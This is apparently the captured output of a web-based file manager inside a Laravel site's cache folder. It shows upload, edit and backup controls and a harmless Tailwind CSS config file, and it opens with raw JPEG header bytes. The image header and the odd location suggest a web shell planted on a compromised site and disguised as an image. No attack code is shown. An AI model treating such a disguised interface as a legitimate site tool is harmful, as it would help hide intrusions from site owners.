����JFIFxx��C ��C��"�� ���}!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br�{
gilour
Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
gilour
/
core
/
storage
/
framework
/
cache
/
data
/
b5
/
fd
:
tailwind.config-20250319204543-20250326080214.js
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
const defaultTheme = require('tailwindcss/defaultTheme'); module.exports = { purge: ['./storage/framework/views/*.php', './resources/views/**/*.blade.php'], theme: { extend: { fontFamily: { sans: ['Nunito', ...defaultTheme.fontFamily.sans], }, }, }, variants: { opacity: ['responsive', 'hover', 'focus', 'disabled'], }, plugins: [require('@tailwindcss/ui')], };